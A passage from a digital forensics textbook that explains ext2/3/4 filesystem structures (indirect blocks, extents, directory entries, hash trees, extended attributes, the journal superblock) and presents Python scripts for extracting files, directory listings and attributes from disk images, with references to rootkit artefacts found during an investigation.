                    if currnode[0].depth == 0:
                        # if there are leaves add them to the end
                        leafNode += currnode[1:]
                    else:
                        nextLevel += currnode[1:]
                if not nextLevel:
                    break # nothing was read, so stop walking
                currentLevel = nextLevel
            # now sort the list by logical block number
            leafNode.sort(key=lambda x: x.block)
            for leaf in leafNode:
                sb = leaf.startHi * pow(2, 32) + leaf.startLo
                eb = sb + leaf.len
                for j in range(sb, eb):
                    datablocks.append(j)
    else:
        # we have the old school blocks
        # round up so that a partial final block is counted
        blocks = (inode.fileSize + blockSize - 1) // blockSize
        # get the direct blocks
        for i in range(0, min(blocks, 12)):
            datablocks.append(inode.block[i])
        # now do indirect blocks
        if blocks > 12:
            iddata = getDataBlock(imageFilename, offset, \
                inode.block[12], blockSize)
            for i in range(0, blockSize // 4):
                idblock = getU32(iddata, i * 4)
                if idblock == 0:
                    break
                else:
                    datablocks.append(idblock)
        # now double indirect blocks
        if blocks > (12 + blockSize // 4):
            diddata = getDataBlock(imageFilename, offset, \
                inode.block[13], blockSize)
            for i in range(0, blockSize // 4):
                didblock = getU32(diddata, i * 4)
                if didblock == 0:
                    break
                else:
                    iddata = getDataBlock(imageFilename, offset, \
                        didblock, blockSize)
                    for j in range(0, blockSize // 4):
                        idblock = getU32(iddata, j * 4)
                        if idblock == 0:
                            break
                        else:
                            datablocks.append(idblock)
        # now triple indirect blocks
        if blocks > (12 + blockSize // 4 + blockSize * blockSize // 16):
            tiddata = getDataBlock(imageFilename, offset, \
                inode.block[14], blockSize)
            for i in range(0, blockSize // 4):
                tidblock = getU32(tiddata, i * 4)
                if tidblock == 0:
                    break
                else:
                    diddata = getDataBlock(imageFilename, offset, \
                        tidblock, blockSize)
                    for j in range(0, blockSize // 4):
                        didblock = getU32(diddata, j * 4)
                        if didblock == 0:
                            break
                        else:
                            iddata = getDataBlock(imageFilename, offset, \
                                didblock, blockSize)
                            for k in range(0, blockSize // 4):
                                idblock = getU32(iddata, k * 4)
                                if idblock == 0:
                                    break
                                else:
                                    datablocks.append(idblock)
    return datablocks

The first helper function, getDataBlock, simply seeks to the correct place in the file image and then reads a block of data. The second function, getBlockList, is a bit more involved. It begins with a check to see if extents are in use. If extents are being used, most files have nothing but leaf nodes in the four entries from the inode block array. We do a quick check to see if the tree depth is zero and, if this is the case, simply read the entries from the inode block array. We do this not just to simplify the code for the most common case, but also because no further disk access is required to generate a block list.
If we have a multi-level tree, we save the current level of nodes and create an empty list of leaf nodes. We then begin a while loop on the line while currentLevel[0].depth != 0:. This loop will execute until the lowest level (leaf nodes) of the tree has been found. Any leaf nodes encountered while walking through the tree are appended to the leafNode list.
After exiting the while loop the leafNode list is sorted by logical block number on the line leafNode.sort(key=lambda x: x.block). Python has the ability to sort a list in place. In order to sort the list we require a function that returns the value by which each item should be ordered. This function is passed into the sort method as the parameter named key. This is where the lambda comes in. In Python a lambda is an anonymous function. The construct key=lambda x: x.block is essentially the same as saying key=f where f is defined as follows:

def f(x):
    return x.block

You can easily see why you wouldn't want to define a named function like this every time you wanted to perform a sort or other operation requiring a single use function. The lambda keyword makes your Python code much more compact and easier to understand once you know how it works.
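A small experiment makes the equivalence easy to see. In the sketch below the Leaf class is a stand-in invented for this example (only its block attribute matters), and operator.attrgetter from the standard library is shown as a third way to supply the same key.

```python
from operator import attrgetter


class Leaf(object):
    """Stand-in for an extent; only the logical block matters here."""
    def __init__(self, block):
        self.block = block


def f(x):
    return x.block


leaves = [Leaf(40), Leaf(0), Leaf(12)]

by_lambda = sorted(leaves, key=lambda x: x.block)
by_named = sorted(leaves, key=f)
by_getter = sorted(leaves, key=attrgetter("block"))

leaves.sort(key=lambda x: x.block)   # sorts the list in place
print([leaf.block for leaf in leaves])
```

All three keys produce the same ordering. The sorted function returns a new list, while the sort method reorders the existing one.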
The code to handle old school blocks is straightforward, but somewhat cumbersome, thanks to the nested loops to handle the indirect blocks. First we calculate the number of blocks required. Then we read in the direct blocks. If the file has any singly indirect blocks we use getDataBlock to read the block and then iterate over the list of up to 1024 blocks. We keep going until we hit the end of the list or an address of zero (which is invalid). If the address is zero, the break command is executed. This command will exit the current loop. If the current loop is nested inside another loop, only the innermost loop is exited. The doubly and triply indirect block handling code is similar, but with extra levels of nested loops.
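The behavior of break inside nested loops can be seen in a few lines. The function collect_until_zero and its sample data are made up for this illustration. Each inner list plays the role of a block of addresses that ends at the first zero.

```python
def collect_until_zero(lists):
    """Gather values from each inner list, stopping at the first zero."""
    collected = []
    for inner in lists:
        for value in inner:
            if value == 0:
                break            # leaves only the inner loop
            collected.append(value)
    return collected


print(collect_until_zero([[5, 6, 0, 7], [8, 0], [9]]))
```

The 7 after the first zero is skipped, yet the outer loop carries on with the next list, just as the doubly indirect code moves on to the next indirect block.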
The icat.py script follows. It is similar to the istat.py file with the biggest difference being a call to getBlockList followed by a loop that prints (writes) every block to standard out.

#!/usr/bin/python
#
# icat.py
#
# This is a simple Python script that will
# print out the file for an inode from an ext2/3/4 filesystem inside
# of an image file.
#
# Developed for Pentester Academy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path
import subprocess
import struct
import time
from math import log

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset> <inode number>\n" \
        "Displays file for an inode from an image file")
    exit(1)

def main():
    # three arguments are required, so argv must hold four items
    if len(sys.argv) < 4:
        usage()

    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])
    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable * \
        emd.superblock.blockSize + \
        inodeLoc[1] * emd.superblock.inodeSize
    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))
    inode = extfs.Inode(data, emd.superblock.inodeSize)
    datablock = extfs.getBlockList(inode, sys.argv[1], sys.argv[2], \
        emd.superblock.blockSize)
    for db in datablock:
        sys.stdout.write(extfs.getDataBlock(sys.argv[1], long(sys.argv[2]), \
            db, emd.superblock.blockSize))

if __name__ == "__main__":
    main()

Partial results from running icat.py against an inode associated with a rootkit are shown in Figure 7.23. The output from the script has been piped to xxd in order to properly display the hex values inside this program. The screenshot shows several embedded strings which contain error messages and even the reverse shell password of "sw0rdm4n".
FIGURE 7.23
Partial results from icat.py against an inode associated with a rootkit on the PFE subject system. The output has been piped to xxd. Note that several error messages and the remote login password are visible in this screenshot.
Directory entries
We have learned that inodes contain all the metadata for a file. They also contain the location of the file's data blocks. The only thing that remains to be known about a file is its name. This connection between an inode and a filename is made in directories. Not surprisingly, directories are stored in files in Linux, the operating system where everything is a file. In our discussion of inodes earlier in this chapter we did say that inode 2 was used to store the root directory.
The classic directory entry consists of a 4-byte inode number, followed by a 2-byte record length, then a 2-byte name length, and finally the name which may be up to 255 characters long. This is shown in Table 7.15. Notice that the name length is two bytes, yet the maximum name length can be stored in only one byte. This may have been done for byte alignment purposes originally.
Table 7.15. The classic directory entry structure.
Offset  Size  Name      Description
0x0     4     Inode     Inode
0x4     2     Rec len   Record length
0x6     2     Name len  Name length
0x8           Name      Name string (up to 255 characters)
Realizing that the upper byte was unused, an (incompatible) filesystem feature, File Type, was created to repurpose this byte to hold file type information. It should be fairly obvious why this is on the incompatible feature list, as interpreting this as part of the name length would make it seem like all the filenames had become garbled. This optimization speeds up any operations that only make sense for a certain type of file by eliminating the need to read lots of inodes merely to determine file type. The directory entry structure for systems with the File Type feature is shown in Table 7.16.
Table 7.16. Directory entry structure when File Type feature is enabled.
Offset  Size  Name       Description
0x0     4     Inode      Inode
0x4     2     Rec len    Record length
0x6     1     Name len   Name length
0x7     1     File type  0x00 Unknown, 0x01 Regular, 0x02 Directory, 0x03 Char device, 0x04 Block device, 0x05 FIFO, 0x06 Socket, 0x07 Symlink
0x8           Name       Name string (up to 255 characters)
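The following sketch parses a single entry laid out as in Table 7.16 and then reads the same bytes the classic way to show why the feature is incompatible. The function parse_dir_entry and the hand-built sample entry are hypothetical and use the struct module directly rather than the helpers in extfs.py.

```python
import struct


def parse_dir_entry(data, offset=0):
    """Unpack one directory entry that uses the File Type layout."""
    inode, rec_len, name_len, file_type = \
        struct.unpack_from("<IHBB", data, offset)
    name = data[offset + 8 : offset + 8 + name_len]
    return inode, rec_len, name_len, file_type, name


# hypothetical entry for the lost+found directory in inode 11
name = b"lost+found"
entry = struct.pack("<IHBB", 11, 20, len(name), 2) + name
entry += b"\x00" * (20 - len(entry))   # pad out to the record length

print(parse_dir_entry(entry))

# a system unaware of the File Type feature reads a 2-byte name length
classic_name_len = struct.unpack_from("<H", entry, 6)[0]
print(classic_name_len)
```

With a file type of 0x02 in the upper byte, the classic interpretation yields a name length of 522 instead of 10, which is exactly the garbling described above.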
The original directories had no checksums or other tools for integrity checking. In order to add this functionality without breaking existing systems, a special type of directory entry known as a directory tail was developed. The directory tail has an inode value of zero which is invalid. Older systems see this and assume that the end of the directory (tail) has been reached. The record length is set correctly to 12. The directory tail structure is shown in Table 7.17.
Table 7.17. Directory tail structure.
Offset  Size  Name       Description
0x0     4     Inode      Set to zero (inode zero is invalid so it is ignored)
0x4     2     Rec len    Record length (set to 12)
0x6     1     Name len   Name length (set to zero so it is ignored)
0x7     1     File type  Set to 0xDE
0x8     4     Checksum   Directory leaf block CRC32 checksum
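Recognizing a directory tail only requires checking the four fixed values in Table 7.17. The sketch below is an illustration under that assumption. The function name directory_tail_checksum and the sample bytes are made up, and no attempt is made to verify the checksum itself.

```python
import struct


def directory_tail_checksum(data, offset=0):
    """Return the stored checksum if a directory tail is found, else None."""
    inode, rec_len, name_len, file_type, checksum = \
        struct.unpack_from("<IHBBI", data, offset)
    if inode == 0 and rec_len == 12 and name_len == 0 and file_type == 0xDE:
        return checksum
    return None


# hypothetical tail carrying a checksum of 0x12345678
tail = struct.pack("<IHBBI", 0, 12, 0, 0xDE, 0x12345678)
print(hex(directory_tail_checksum(tail)))

# an ordinary 12-byte entry for "." in inode 2 is not a tail
dot = struct.pack("<IHBB", 2, 12, 1, 2) + b".\x00\x00\x00"
print(directory_tail_checksum(dot))
```

In a directory block with checksums enabled the tail would be expected in the last 12 bytes of the block, so the offset passed in would normally be the block size minus 12.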
The linear directories presented thus far in this section are fine as long as the directories do not grow too large. When directories become large, implementing hash directories can improve performance. Just as is done with the checksum, hash entries are stored after the end of the directory block in order to fool old systems into ignoring them. Recall that there is an ext4_index flag in the inode that will alert compatible systems to the presence of the hash entries.
The directory nodes are stored in a hashed balanced tree which is often shortened to htree. We have seen trees in our discussion of extents earlier in this chapter. Those familiar with NTFS know that directories on NTFS filesystems are stored in trees. In the NTFS case, nodes are named based on their filename. With htrees on extended filesystems nodes are named by their hash values. Because the hash value is only four bytes long, collisions will occur. For this reason, once a record has been located based on the hash value a string comparison of filenames is performed, and if the strings do not match, the next record (which should have the same hash) is checked until a match is found.
The root hash directory block starts with the traditional "." and ".." directory entries for this directory and the parent directory, respectively. After these two entries (both of which are twelve bytes long), there is a 16-byte header, followed by 8-byte entries through the end of the block. The root hash directory block structure is shown in Table 7.18.
Table 7.18. Root hash directory block structure.
Offset  Size  Name          Description
0x0     12    Dot rec       "." directory entry (12 bytes)
0xC     12    DotDot rec    ".." directory entry (12 bytes)
0x18    4     Inode no      Inode number set to 0 to make following be ignored
0x1C    1     Hash version  0x00 Legacy, 0x01 Half MD4, 0x02 Tea, 0x03 Legacy unsigned, 0x04 Unsigned half MD4, 0x05 Unsigned Tea
0x1D    1     Info length   Hash info length (0x8)
0x1E    1     Indir levels  Depth of tree
0x1F    1     Unused flag   Flags (unused)
0x20    2     Limit         Max number of entries that follow this header
0x22    2     Count         Actual number of entries after header
0x24    4     Block         Block w/i directory for hash=0
0x28          Entries       Remainder of block is 8-byte entries
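As a rough illustration of Table 7.18, the sketch below pulls the header fields out of a root hash directory block. The names parse_hash_root and HASH_VERSIONS are invented for this example, the sample block is fabricated, and the 8-byte entries that follow the header are deliberately left unparsed.

```python
import struct

HASH_VERSIONS = {
    0x00: "Legacy",
    0x01: "Half MD4",
    0x02: "Tea",
    0x03: "Legacy unsigned",
    0x04: "Unsigned half MD4",
    0x05: "Unsigned Tea",
}


def parse_hash_root(block):
    """Unpack the header fields found at offsets 0x1C through 0x27."""
    version, info_len, levels, flags = \
        struct.unpack_from("<BBBB", block, 0x1C)
    limit, count, first_block = struct.unpack_from("<HHI", block, 0x20)
    return {"hash": HASH_VERSIONS.get(version, "Unknown"),
            "info length": info_len, "levels": levels,
            "limit": limit, "count": count, "block": first_block}


# fabricated block: the first 0x1C bytes (dot entries and the zero
# inode number) are left as zeros, followed by the header fields
sample = b"\x00" * 0x1C + struct.pack("<BBBBHHI", 1, 8, 0, 0, 508, 3, 1)
print(parse_hash_root(sample))
```

An info length other than 8 or an unknown hash version would be a reasonable sign that the block is not really a root hash directory block.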
If there are any interior nodes, they have the structure shown in Table 7.19. Note that three of the fields are in italics. The reason for this is that I have found some code that refers to these fields and other places that seem to imply that these fields are not present.
Table 7.19. Interior node hash directory block structure. Entries in italics may not be present in all systems.
Offset  Size  Name         Description
0x0     4     Fake inode   Set to zero so this is ignored
0x4     2     Fake reclen  Set to block size (4k)
0x6     1     Name length  Set to zero
0x7     1     File type    Set to zero
0x8     2     Limit        Max entries that follow
0xA     4     Count        Actual entries that follow
0xE     4     Block        Block w/i directory for lowest hash value of block
0x12          Entries      Directory entries
The hash directory entries (leaf nodes) consist of two 4-byte values for the hash and block within the directory of the next node. The hash directory entries are terminated with a special entry with a hash of zero and the checksum in the second 4-byte value. These entries are shown in Table 7.20 and Table 7.21.
Table 7.20. Hash directory entry structure.
Offset  Size  Name   Description
0x0     4     Hash   Hash value
0x4     4     Block  Block w/i directory of next node
Table 7.21. Hash directory entry tail with checksum.
Offset  Size  Name      Description
0x0     4     Reserved  Set to zero
0x4     4     Checksum  Block checksum
We can now add some code to our extfs.py file in order to interpret directories. To keep things simple, we won't utilize the hash directories if they exist. For our purposes there is likely to be little if any speed penalty for doing so. The additions to our extfs.py file follow.

def printFileType(ftype):
    if ftype == 0x0 or ftype > 7:
        return "Unknown"
    elif ftype == 0x1:
        return "Regular"
    elif ftype == 0x2:
        return "Directory"
    elif ftype == 0x3:
        return "Character device"
    elif ftype == 0x4:
        return "Block device"
    elif ftype == 0x5:
        return "FIFO"
    elif ftype == 0x6:
        return "Socket"
    elif ftype == 0x7:
        return "Symbolic link"

class DirectoryEntry():
    def __init__(self, data):
        self.inode = getU32(data)
        self.recordLen = getU16(data, 0x4)
        self.nameLen = getU8(data, 0x6)
        self.fileType = getU8(data, 0x7)
        self.filename = data[0x8 : 0x8 + self.nameLen]

    def prettyPrint(self):
        print("Inode: %s File type: %s Filename: %s" % (str(self.inode), \
            printFileType(self.fileType), self.filename))

# parses directory entries in a data block that is passed in
def getDirectory(data):
    retVal = []
    i = 0
    # every entry needs at least its 8-byte fixed portion
    while i + 8 <= len(data):
        de = DirectoryEntry(data[i : ])
        if de.recordLen < 8:
            # zeroed or corrupt data; stop rather than loop forever
            break
        # entries with an inode of zero (deleted entries, directory
        # tails, and hash tree nodes) are skipped so that entries in
        # any following blocks are still listed
        if de.inode != 0:
            retVal.append(de)
        i += de.recordLen
    return retVal

There are no new techniques in the code above. We can also create a new script, ils.py, which will create a directory listing based on an inode rather than a directory name. The code for this new script follows. You might notice that this script is very similar to icat.py with the primary difference being that the data is interpreted as a directory instead of being written to standard out.

#!/usr/bin/python
#
# ils.py
#
# This is a simple Python script that will
# print out a directory listing for an inode from an ext2/3/4
# filesystem inside of an image file.
#
# Developed for Pentester Academy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path
import subprocess
import struct
import time
from math import log

def usage():
    print("usage " + sys.argv[0] + " <image file> <offset> <inode number>\n" \
        "Displays directory for an inode from an image file")
    exit(1)

def main():
    # three arguments are required, so argv must hold four items
    if len(sys.argv) < 4:
        usage()

    # read first sector
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        exit(1)
    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])
    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable \
        * emd.superblock.blockSize + \
        inodeLoc[1] * emd.superblock.inodeSize
    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))
    inode = extfs.Inode(data, emd.superblock.inodeSize)
    datablock = extfs.getBlockList(inode, sys.argv[1], sys.argv[2], \
        emd.superblock.blockSize)
    data = ""
    for db in datablock:
        data += extfs.getDataBlock(sys.argv[1], long(sys.argv[2]), db, \
            emd.superblock.blockSize)
    # named entries rather than dir to avoid hiding the built-in dir()
    entries = extfs.getDirectory(data)
    for fname in entries:
        fname.prettyPrint()

if __name__ == "__main__":
    main()

The results from running the new script against the root directory (inode 2) and the /tmp directory from the PFE subject system are shown in Figure 7.24 and Figure 7.25, respectively. Notice that the "lost+found" directory is in inode 11 which is the expected place. In Figure 7.25 two files associated with a rootkit are highlighted.
FIGURE 7.24
Running ils.py against the root directory of the PFE subject system.
FIGURE 7.25
Running ils.py against the /tmp directory of the PFE subject system.
Extended attributes
The extended filesystem family supports extended attributes. The first use of extended attributes was for Access Control Lists (ACL). While it is certainly not uncommon for extended attributes to house ACLs today, they can be used to store almost anything as a user attribute if the attribute name begins with “user.”. Something to keep in mind is that older kernels required the correct set of mounting options to be used when ACLs are implemented. This is another reason to capture the mount information during your live analysis.
If the extended attribute is small, it can be stored in the extra space between inodes. Currently there are 100 bytes of extra space. Larger extended attributes can be stored in a data block pointed to by file_acl in the inode. An attacker might use a user attribute to hide information on a hacked system. This is similar to using Alternate Data Streams (ADS) to attach hidden information to a file on an NTFS filesystem. There is one important difference between user attributes and ADS, however. There are standard tools for displaying extended attributes on Linux, and, unlike with ADS, you need not know the exact attribute name to use them.
Whether stored in inodes or data blocks, all extended attribute lists begin with a header. The header does vary in these two cases, however. The header inside the inode consists of a 4-byte magic number only. The extended attributes header structures for attributes stored in the inode and data block are shown in Table 7.22 and Table 7.23, respectively.
Table 7.22. Extended attribute header for attributes in an inode.
Offset  Size  Name      Description
0x0     4     Magic no  0xEA020000
Table 7.23. Extended attribute header for attributes in a data block.
Offset  Size  Name      Description
0x0     4     Magic no  0xEA020000
0x4     4     Refcount  Reference count
0x8     4     Blocks    Blocks used to store extended attributes
0xC     4     Hash      Hash
0x10    4     Checksum  Checksum
0x14    12    Reserved  Should be zeroed
The extended attribute entry or entries follow(s) the header. The extended attribute entry structure is shown in Table 7.24. Note the use of a name index in order to reduce storage.
Table 7.24. Extended attribute entry structure.
Offset  Size  Name         Description
0x0     1     Name len     Length of attribute name
0x1     1     Name index   0x0 = no prefix, 0x1 = user. prefix, 0x2 = system.posix_acl_access, 0x3 = system.posix_acl_default, 0x4 = trusted., 0x6 = security., 0x7 = system., 0x8 = system.richacl
0x2     2     Value offs   Offset from first inode entry or start of block
0x4     4     Value block  Disk block where value stored or zero for this block
0x8     4     Value size   Length of value
0xC     4     Hash         Hash for attribs in block or zero if in inode
0x10          Name         Attribute name w/o trailing NULL
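To make the layout in Tables 7.22 and 7.24 concrete, here is a minimal standalone sketch (Python 3, not part of the extfs module) that walks the entries of an in-inode attribute region. The function names and the demo region are hypothetical. It assumes little-endian fields, value offsets measured from the first entry as the table states, and entries padded to a 4-byte boundary, which is my understanding of the ext4 on-disk format rather than something stated in the tables.

```python
import struct

XATTR_MAGIC = 0xEA020000
ENTRY_HEADER_LEN = 0x10  # fixed part of an entry, per Table 7.24


def entry_stride(name_len):
    """Bytes from the start of one entry to the next (assumed 4-byte aligned)."""
    return (ENTRY_HEADER_LEN + name_len + 3) & ~3


def parse_inode_xattrs(region):
    """Parse an in-inode attribute region that starts at the magic number.

    Returns a dict mapping (name index, name) to the raw value bytes.
    """
    attrs = {}
    if len(region) < 4 or struct.unpack_from("<I", region, 0)[0] != XATTR_MAGIC:
        return attrs
    first = 4  # the first entry follows the 4-byte magic number
    pos = first
    while pos + ENTRY_HEADER_LEN <= len(region):
        name_len, name_index, value_offs, value_block, value_size, _hash = \
            struct.unpack_from("<BBHIII", region, pos)
        if name_len == 0 and name_index == 0 and value_offs == 0:
            break  # four zero bytes mark the end of the list
        name_start = pos + ENTRY_HEADER_LEN
        name = region[name_start:name_start + name_len]
        # value offsets are relative to the first entry (assumption from Table 7.24)
        value = region[first + value_offs:first + value_offs + value_size]
        attrs[(name_index, name.decode("ascii", "replace"))] = value
        pos += entry_stride(name_len)
    return attrs


def build_demo_region():
    """Build a synthetic region holding one attribute, user.note = hello."""
    name, value = b"note", b"hello"
    value_offs = 40  # arbitrary offset chosen for the demo
    entry = struct.pack("<BBHIII", len(name), 1, value_offs, 0, len(value), 0) + name
    region = struct.pack("<I", XATTR_MAGIC) + entry
    region = region.ljust(4 + value_offs, b"\0") + value
    return region.ljust(64, b"\0")


if __name__ == "__main__":
    print(parse_inode_xattrs(build_demo_region()))
```

The name index is kept as a number here; mapping it to a prefix string is a simple lookup against the values listed in Table 7.24.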
The standard Linux commands for displaying extended attribute and ACL information are getfattr and getfacl, respectively. Not surprisingly, the commands to alter extended attributes and ACLs are setfattr and setfacl, respectively. See the man pages for details on these commands. Basic usage of these commands is demonstrated in Figure 7.26.
FIGURE 7.26
Using the commands to set and get extended attributes.
The following code will add extended attribute support to our extfs Python module. There are no previously undiscussed techniques in this code.

"""
printExtAttrPrefix. Converts a 1-byte prefix
code for an extended attribute name to a string.
Usage: prefixString = printExtAttrPrefix(index)
"""
def printExtAttrPrefix(index):
  if index == 0 or index > 8:
    return ""
  elif index == 1:
    return "user."
  elif index == 2:
    return "system.posix_acl_access"
  elif index == 3:
    return "system.posix_acl_default"
  elif index == 4:
    return "trusted."
  elif index == 6:
    return "security."
  elif index == 7:
    return "system."
  elif index == 8:
    return "system.richacl"
  # index 5 is not listed in Table 7.24; treat it as no prefix
  return ""

"""
Class ExtAttrEntry. Stores the raw
extended attribute structure with the
prefix prepended to the attribute name.
Usage: ea = ExtAttrEntry(data, offset=0)
where data is a packed string representing the
extended attribute and offset is the starting point
in this block of data for this entry.
"""
class ExtAttrEntry():
  def __init__(self, data, offset=0):
    self.nameLen = getU8(data, offset + 0x0)
    self.nameIndex = getU8(data, offset + 0x1)
    self.valueOffset = getU16(data, offset + 0x2)
    self.valueBlock = getU32(data, offset + 0x4)
    self.valueSize = getU32(data, offset + 0x8)
    self.valueHash = getU32(data, offset + 0xc)
    self.name = printExtAttrPrefix(self.nameIndex) + \
      str(data[offset + 0x10 : offset + 0x10 + self.nameLen])

"""
Usage:
getExtAttrsFromBlock(imageFilename, offset, blockNo, blocksize)
where imageFilename is a raw ext2/ext3/ext4 image, offset is
the offset in 512 byte sectors to the start of the filesystem,
blockNo is the data block holding the extended attributes, and
blocksize is the filesystem block size (default=4k).
"""
def getExtAttrsFromBlock(imageFilename, offset, \
  blockNo, blockSize=4096):
  data = getDataBlock(imageFilename, offset, \
    blockNo, blockSize)
  return getExtAttrsHelper(False, imageFilename, \
    offset, data, blockSize)

"""
Usage:
getExtAttrsInInode(imageFilename, offset, data, blocksize)
where imageFilename is a raw ext2/ext3/ext4 image, offset is
the offset in 512 byte sectors to the start of the filesystem,
data is the packed string holding the extended attributes, and
blocksize is the filesystem block size (default=4k).
"""
def getExtAttrsInInode(imageFilename, offset, data, blockSize=4096):
  return getExtAttrsHelper(True, imageFilename, offset, data, blockSize)

# This is a helper function for the preceding two functions
def getExtAttrsHelper(inInode, imageFilename, offset, data, blockSize=4096):
  # first four bytes are magic number
  retVal = {}
  if getU32(data, 0) != 0xEA020000:
    return retVal
  done = False
  if inInode:
    i = 4   # entries follow the 4-byte magic number
  else:
    i = 32  # entries follow the 32-byte block header
  # value offsets are relative to the first entry when the attributes
  # are in the inode, or to the start of the block (see Table 7.24)
  base = i if inInode else 0
  while not done:
    # stop if a complete 16-byte entry no longer fits in the data
    if i + 0x10 > len(data):
      break
    eae = ExtAttrEntry(data, i)
    # is this an extended attribute or not
    if eae.nameLen == 0 and eae.nameIndex == 0 and eae.valueOffset == 0 \
      and eae.valueBlock == 0:
      done = True
    else:
      # in the inode or external block?
      if eae.valueBlock == 0:
        v = data[base + eae.valueOffset : base + eae.valueOffset + eae.valueSize]
      else:
        v = getDataBlock(imageFilename, offset, eae.valueBlock, \
          blockSize)[eae.valueOffset : eae.valueOffset + eae.valueSize]
      retVal[eae.name] = v
      # the next entry starts after the 16-byte fixed fields and the
      # name, rounded up to a 4-byte boundary
      i += (0x10 + eae.nameLen + 3) & ~3
  return retVal
The following script can be used to print out extended attributes for an inode in an image. I include this mostly for completeness. If you mount the filesystem image, it is easy to list out these attributes using standard system tools discussed in this section.

#!/usr/bin/python
#
# igetattr.py
#
# This is a simple Python script that will
# print out extended attributes in an inode from an ext2/3/4
# filesystem inside of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path
import subprocess
import struct
import time
from math import log

def usage():
  print("usage " + sys.argv[0] + " <image file> <offset> <inode number>\n" \
    "Displays extended attributes in an image file")
  exit(1)

def main():
  # the script name plus three arguments are required
  if len(sys.argv) < 4:
    usage()

  # make sure the image file exists
  if not os.path.isfile(sys.argv[1]):
    print("File " + sys.argv[1] + " cannot be opened for reading")
    exit(1)
  emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])
  # get inode location
  inodeLoc = extfs.getInodeLoc(sys.argv[3], \
    emd.superblock.inodesPerGroup)
  offset = emd.bgdList[inodeLoc[0]].inodeTable * \
    emd.superblock.blockSize + inodeLoc[1] * emd.superblock.inodeSize
  with open(str(sys.argv[1]), 'rb') as f:
    f.seek(offset + int(sys.argv[2]) * 512)
    data = str(f.read(emd.superblock.inodeSize))
  inode = extfs.Inode(data, emd.superblock.inodeSize)
  if inode.hasExtendedAttributes:
    # is it in the inode slack or a data block
    if inode.extendAttribs == 0:
      # pass the image name and filesystem offset (in sectors)
      attrs = extfs.getExtAttrsInInode(sys.argv[1], long(sys.argv[2]), \
        data[inode.inodeSize:], emd.superblock.blockSize)
    else:
      # extendAttribs holds the block number of the attribute block
      attrs = extfs.getExtAttrsFromBlock(sys.argv[1], long(sys.argv[2]), \
        inode.extendAttribs, emd.superblock.blockSize)
    for k, v in attrs.iteritems():
      print "%s: %s" % (k, v)
  else:
    print 'Inode %s has no extended attributes' % (sys.argv[3])

if __name__ == "__main__":
  main()
JOURNALING
As previously mentioned, the journal is used to increase the likelihood of the filesystem being in a consistent state. As with most things Linux, the journaling behavior is highly configurable. The default is to only write metadata (not data blocks) through the journal. This is done for performance reasons. The default can be changed via the mount data option. The option data=journal causes all data blocks to be written through the journal. There are other options as well. See the mount man page for details.
The journal causes data to be written twice. The first time data is written to the disk as quickly as possible. To accomplish this, the journal is stored in one block group and often is the only thing stored in the group. This minimizes disk seek times. Later, after the data has been committed to the journal, the operating system will write the data to the correct location on the disk and then erase the commitment record. This not only improves data integrity but it also improves performance by caching many small writes before writing everything to disk.
The journal is normally stored in inode 8, but it may optionally be stored on an external device. The latter does not seem to be very common. Regardless of where it is stored, the journal contains a special superblock that describes itself. When examining the journal directly it is important to realize that the journal stores information in big endian format. The journal superblock is summarized in Table 7.25.
Table 7.25. The journal superblock.
Offset  Type  Name                 Description
0x0     be32  h_magic              Jbd2 magic number, 0xC03B3998
0x4     be32  h_blocktype          Should be 4, journal superblock v2
0x8     be32  h_sequence           Transaction ID for this block
0xC     be32  s_blocksize          Journal device block size.
0x10    be32  s_maxlen             Total number of blocks in this journal.
0x14    be32  s_first              First block of log information.
0x18    be32  s_sequence           First commit ID expected in log.
0x1C    be32  s_start              Block number of the start of log.
0x20    be32  s_errno              Error value, as set by jbd2_journal_abort().
0x24    be32  s_feature_compat     Compatible features. 0x1 = Journal maintains checksums
0x28    be32  s_feature_incompat   Incompatible feature set.
0x2C    be32  s_feature_ro_compat  Read-only compatible feature set. There aren’t any of these currently.
0x30    u8    s_uuid[16]           128-bit uuid for journal. This is compared against the copy in the ext4 superblock at mount time.
0x40    be32  s_nr_users           Number of filesystems sharing this journal.
0x44    be32  s_dynsuper           Location of dynamic superblock copy.
0x48    be32  s_max_transaction    Limit of journal blocks per transaction.
0x4C    be32  s_max_trans_data     Limit of data blocks per transaction.
0x50    u8    s_checksum_type      Checksum algorithm used for the journal. Probably 1 = crc32 or 4 = crc32c.
0x51    u8    Padding[0xAB]        0xAB bytes of padding
0xFC    be32  s_checksum           Checksum of the entire superblock, with this field set to zero.
0x100   u8    s_users[16*48]       IDs of all filesystems sharing the log.
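Because the journal is big endian while the rest of the filesystem is little endian, it is easy to misread these fields. The following is a small sketch (Python 3, standalone) that decodes the first part of Table 7.25 from a raw block. The function name and demo values are hypothetical, and the block type names other than 4 come from my reading of the kernel's jbd2 header rather than from the table.

```python
import struct

JBD2_MAGIC = 0xC03B3998

# Block type 4 is from Table 7.25; the others are assumed from the jbd2 header.
BLOCK_TYPES = {1: "descriptor", 2: "commit", 3: "superblock v1",
               4: "superblock v2", 5: "revocation"}

FIELD_NAMES = ("h_magic", "h_blocktype", "h_sequence", "s_blocksize",
               "s_maxlen", "s_first", "s_sequence", "s_start", "s_errno",
               "s_feature_compat", "s_feature_incompat", "s_feature_ro_compat")


def parse_journal_superblock(block):
    """Decode offsets 0x0 through 0x3F of a journal superblock."""
    # ">" selects big-endian; twelve be32 fields span 0x0 through 0x2F
    fields = dict(zip(FIELD_NAMES, struct.unpack_from(">12I", block, 0)))
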